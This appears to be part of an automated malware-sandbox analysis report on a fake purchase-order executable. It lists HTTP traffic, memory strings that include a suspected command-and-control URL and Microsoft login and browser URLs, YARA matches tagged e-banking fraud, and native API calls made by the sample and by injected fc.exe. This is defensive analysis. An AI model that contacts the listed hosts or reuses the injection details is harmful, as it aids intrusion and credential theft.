              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG9Q%2Br8K4ZDKEBQ1kr%2FZqJy8tvBunTC4GIqYr%2BQgA0N34%2FARRgRfiV8pdBAoTUSJme3z%2Be%2FXzOOqFtSAoRXUp8DfFwhwq95Z%2BJYTxEaLPJA2ovqgVfXdt8aL6O1lC2U9Piox"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb687e8445890-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7243&min_rtt=7243&rtt_var=3621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P77ltRN%2BFyuc2GmUt6LAw4BVJS6TT2sWZwrK7mNOXF143G%2BlRLHUdpHYjV3MPKqMEfu34N9MoAWoTUn8DLCE1GebXO0qzUWzhw9ddzsBnVwi9J%2FTO8t%2BS1Xx7%2BrULGVYboSp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6980c7faadf-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14118&min_rtt=14118&rtt_var=7059&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B316oEP6nehNekEPmV%2BueJXQ7ST3BIWGP1zZddQCxxnZC%2BQF4Tb%2B9Q3Xw8GVS2DbsDLhyt5Dh6yTSFKbjLkuh6hws%2FhQ7GY09otUCyw3k1va%2F3i%2BcrKjXi9m1XMkL1zFjxhg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6a7db15ab5a-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13632&min_rtt=13632&rtt_var=6816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:17 GMTEtag: "6743f11f-94"Server: nginxConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:20 GMTEtag: "6743f11f-94"Server: nginxConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:23 GMTEtag: "6743f11f-94"Server: nginxConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:25 GMTEtag: "6743f11f-94"Server: nginxConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:31 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:33 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:36 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:38 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:09 GMTContent-Type: text/htmlContent-Length: 166Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:12 GMTContent-Type: text/htmlContent-Length: 166Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 16:25:14 GMTContent-Type: text/htmlContent-Length: 166Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 16:25:17 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:07 GMTServer: nginxX-Cache: BYPASSConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:10 GMTServer: nginxX-Cache: BYPASSConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:12 GMTServer: nginxX-Cache: BYPASSConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:26:15 GMTServer: nginxX-Cache: BYPASSConnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:26:21 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:26:24 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:35 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbQxDok4yUYG5qBuv3QGBZTXN1BAzF9TZV3kRgA4ojlqeLvEIwQjatNIdLBaUnytMJnkXii0x23tJCFBdpvWR7MbmcdNSLBirGb8%2Bu6R2qxT1r4racD05ooIrYr%2FvLWeA9T%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8b11de48268-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7345&min_rtt=7345&rtt_var=3672&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:37 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5X2XF4qtA7oxMelL%2BA8PdxuK12d6KTXVymiAWlp9KayTNNIKFTKCQTKJN2Y%2B8WaVXbjjQdfrKWlcYqrqs23pry55dut8fRChm0lmO0d%2FRzaHYe0%2Fmw1M%2BjVb27jfWbeC5XxI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8c0f8c39c7c-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7210&min_rtt=7210&rtt_var=3605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:26:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Thu, 16 Jan 2025 08:26:40 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ru8W4zVBt6ZgXdSWpV4VK9ml8vjiO1ctc7rH7xDNUlCK%2BMFxRYvE9TxbVDd6V2wYvxoitSssnk0Zi%2F6tEeemvKMHkWgmVVuDPTZV7CcuOZnHsuP9u4EwPIFkwbRMFYv5n%2Bg%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb8d109aeab7c-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14180&min_rtt=14180&rtt_var=7090&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000007216000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000050A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3926275354.00000000084BD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3926275354.00000000084BD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info/8rr3/
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3925085807.0000000006A3C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3920746147.00000000048CC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000004.00000002.3919628546.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 00000004.00000002.3919628546.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000004.00000002.3919628546.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000004.00000003.2595895926.0000000008227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000004.00000003.2600812836.0000000008275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F3CB43 NtClose,0_2_00F3CB43
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2B60 NtClose,LdrInitializeThunk,0_2_00FD2B60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_00FD2C70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_00FD2DF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD35C0 NtCreateMutant,LdrInitializeThunk,0_2_00FD35C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD4340 NtSetContextThread,0_2_00FD4340
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD4650 NtSuspendThread,0_2_00FD4650
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AF0 NtWriteFile,0_2_00FD2AF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AD0 NtReadFile,0_2_00FD2AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2AB0 NtWaitForSingleObject,0_2_00FD2AB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BF0 NtAllocateVirtualMemory,0_2_00FD2BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BE0 NtQueryValueKey,0_2_00FD2BE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2BA0 NtEnumerateValueKey,0_2_00FD2BA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2B80 NtQueryInformationFile,0_2_00FD2B80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CF0 NtOpenProcess,0_2_00FD2CF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CC0 NtQueryVirtualMemory,0_2_00FD2CC0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2CA0 NtQueryInformationToken,0_2_00FD2CA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C60 NtCreateKey,0_2_00FD2C60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2C00 NtQueryInformationProcess,0_2_00FD2C00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DD0 NtDelayExecution,0_2_00FD2DD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2DB0 NtEnumerateKey,0_2_00FD2DB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D30 NtUnmapViewOfSection,0_2_00FD2D30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D10 NtMapViewOfSection,0_2_00FD2D10
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2D00 NtSetInformationFile,0_2_00FD2D00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2EE0 NtQueueApcThread,0_2_00FD2EE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2EA0 NtAdjustPrivilegesToken,0_2_00FD2EA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2E80 NtReadVirtualMemory,0_2_00FD2E80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2E30 NtWriteVirtualMemory,0_2_00FD2E30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FE0 NtCreateFile,0_2_00FD2FE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FB0 NtResumeThread,0_2_00FD2FB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2FA0 NtQuerySection,0_2_00FD2FA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F90 NtProtectVirtualMemory,0_2_00FD2F90
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F60 NtCreateProcessEx,0_2_00FD2F60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2F30 NtCreateSection,0_2_00FD2F30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3090 NtSetValueKey,0_2_00FD3090
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3010 NtOpenDirectoryObject,0_2_00FD3010
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD39B0 NtGetContextThread,0_2_00FD39B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3D70 NtOpenThread,0_2_00FD3D70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD3D10 NtOpenProcessToken,0_2_00FD3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E4340 NtSetContextThread,LdrInitializeThunk,4_2_038E4340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E4650 NtSuspendThread,LdrInitializeThunk,4_2_038E4650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_038E2BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_038E2BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_038E2BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2B60 NtClose,LdrInitializeThunk,4_2_038E2B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AD0 NtReadFile,LdrInitializeThunk,4_2_038E2AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AF0 NtWriteFile,LdrInitializeThunk,4_2_038E2AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FB0 NtResumeThread,LdrInitializeThunk,4_2_038E2FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FE0 NtCreateFile,LdrInitializeThunk,4_2_038E2FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F30 NtCreateSection,LdrInitializeThunk,4_2_038E2F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_038E2E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_038E2EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DD0 NtDelayExecution,LdrInitializeThunk,4_2_038E2DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_038E2DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_038E2D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_038E2D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_038E2CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C60 NtCreateKey,LdrInitializeThunk,4_2_038E2C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_038E2C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E35C0 NtCreateMutant,LdrInitializeThunk,4_2_038E35C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E39B0 NtGetContextThread,LdrInitializeThunk,4_2_038E39B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2B80 NtQueryInformationFile,4_2_038E2B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2AB0 NtWaitForSingleObject,4_2_038E2AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F90 NtProtectVirtualMemory,4_2_038E2F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2FA0 NtQuerySection,4_2_038E2FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2F60 NtCreateProcessEx,4_2_038E2F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2EA0 NtAdjustPrivilegesToken,4_2_038E2EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2E30 NtWriteVirtualMemory,4_2_038E2E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2DB0 NtEnumerateKey,4_2_038E2DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2D00 NtSetInformationFile,4_2_038E2D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CC0 NtQueryVirtualMemory,4_2_038E2CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2CF0 NtOpenProcess,4_2_038E2CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E2C00 NtQueryInformationProcess,4_2_038E2C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3090 NtSetValueKey,4_2_038E3090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3010 NtOpenDirectoryObject,4_2_038E3010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3D10 NtOpenProcessToken,4_2_038E3D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E3D70 NtOpenThread,4_2_038E3D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E93B0 NtCreateFile,4_2_030E93B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9610 NtDeleteFile,4_2_030E9610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E96B0 NtClose,4_2_030E96B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9520 NtReadFile,4_2_030E9520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030E9820 NtAllocateVirtualMemory,4_2_030E9820
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03966BD74_2_03966BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396AB404_2_0396AB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038AEA804_2_038AEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B29A04_2_038B29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0397A9A64_2_0397A9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C69624_2_038C6962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038968B84_2_038968B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038DE8F04_2_038DE8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BA8404_2_038BA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B28404_2_038B2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0392EFA04_2_0392EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A2FC84_2_038A2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BCFE04_2_038BCFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03952F304_2_03952F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F2F284_2_038F2F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038D0F304_2_038D0F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03924F404_2_03924F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396CE934_2_0396CE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C2E904_2_038C2E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396EEDB4_2_0396EEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396EE264_2_0396EE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B0E594_2_038B0E59
